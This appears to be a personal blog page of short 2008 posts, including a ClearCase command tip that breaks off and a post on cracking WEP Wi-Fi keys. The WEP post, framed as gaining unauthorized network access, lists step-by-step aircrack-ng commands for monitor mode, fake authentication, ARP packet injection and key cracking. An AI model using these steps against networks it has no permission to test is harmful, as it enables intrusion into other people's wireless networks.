Sunday, May 18, 2008

Nvidia Widget

Nvidia Widget:

Thursday, May 8, 2008

My first experience in WEP hacking

Is been years I thinking and wonder how to hack AP to get unauthorized access into wireless network.

I finally done it. Thanks to my friend provide me supported hardware (WG2000 with chipset zd1211) and a friend with kernel hacker expert :)

Here is the operating system environment:

FedoraCore 6 (kernel version

- ieee80211.patch

- zd12111_firmware1.4

- zd1211rw.patch

Hacking WEP steps:

0. Enable Wireless adaptor with monitor mode
-> airmon-ng start [adaptor_interface]
-> airmon-ng start wlan0

1. View surounding APs
-> airodump-ng
-> airodump-ng wlan0

2. Target single AP and Channel, then start capturing the packet info
-> airodump-ng -c [channel] --bssid [ap_mac] -w [outfilename] [adaptor_interface]

3. Do fake authentication
-> aireplay-ng -1 0 -e [ap_name] -a [ap_mac] -h [adaptor_mac] [adaptor_interface]

4. Keep fake authenication alive
-> aireplay-ng -1 6000 -o 1 -q 10 -e [ap_name] -a [ap_mac] -h [adaptor_mac][adaptor_interface]

5. Make packet injection with arp attack
-> aireplay-ng -3 -b [ap_mac] -h [adaptor_mac] [adaptor_interface]

6. Crack the AP KEY with .cap
-> aircrack-ng -z -b [ap_mac] [outfilename].cap
-> aircrack-ng -b [ap_mac] [outfilename].cap

Steps 5 and 6 can be executed parallel :D

Tuesday, May 6, 2008

Search for latest version of branch type

To search latest version number for specific branch type:

cleartool find /vobs/vobname -branch "brtype(branchtypename)" -version "version(.../branchtypename/LATEST)" -print tee brantypelist.txt

The example result will be:


